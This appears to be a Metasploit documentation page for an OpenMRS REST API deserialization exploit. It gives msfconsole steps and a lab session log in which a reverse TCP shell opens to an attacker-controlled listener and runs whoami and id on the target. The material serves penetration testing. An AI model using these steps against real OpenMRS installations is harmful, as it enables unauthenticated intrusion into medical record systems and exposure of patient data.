adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
407adca9ecb38dee74b4e2d658f23cccecc3bf11
metasploit-gs/documentation/modules/exploit/multi/http/openmrs_deserialization.md
T
Shelby Pace 407adca9ec add docs
2019-11-21 14:15:57 -06:00

2.3 KiB
Raw Blame History

Vulnerable Application

OpenMRS is an open-source platform that supplies users with a customizable medical record system.

There exists an object deserialization vulnerability in the webservices.rest module used in OpenMRS Platform for versions below v2.24.0. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as /ws/rest/v1/concept.

Vulnerable versions of the software can be found here.

Tested on OpenMRS Platform v2.1.2 and v2.21 with Java 8 and Java 9.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/openmrs_deserialization
  4. Do: set TARGETURI <uri>
  5. Do: set RHOSTS <ip>
  6. Do: run
  7. You should get a shell.

Options

ForceExploit

Overrides the check result and runs the exploit.

Scenarios

Version of software and OS as applicable

msf5 > use exploit/multi/http/openmrs_deserialization 
msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
rhosts => 192.168.37.168
msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
targeturi => /openmrs-standalone
msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/http/openmrs_deserialization) > check
[*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
msf5 exploit(multi/http/openmrs_deserialization) > run

[*] Started reverse TCP double handler on 192.168.37.1:4444 
[*] Target is running OpenMRS
[*] Formatting payload
[*] Sending payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo wKYK4x9ZOHJ37tm7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "wKYK4x9ZOHJ37tm7\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600

whoami
space
id
uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
Reference in New Issue View Git Blame Copy Permalink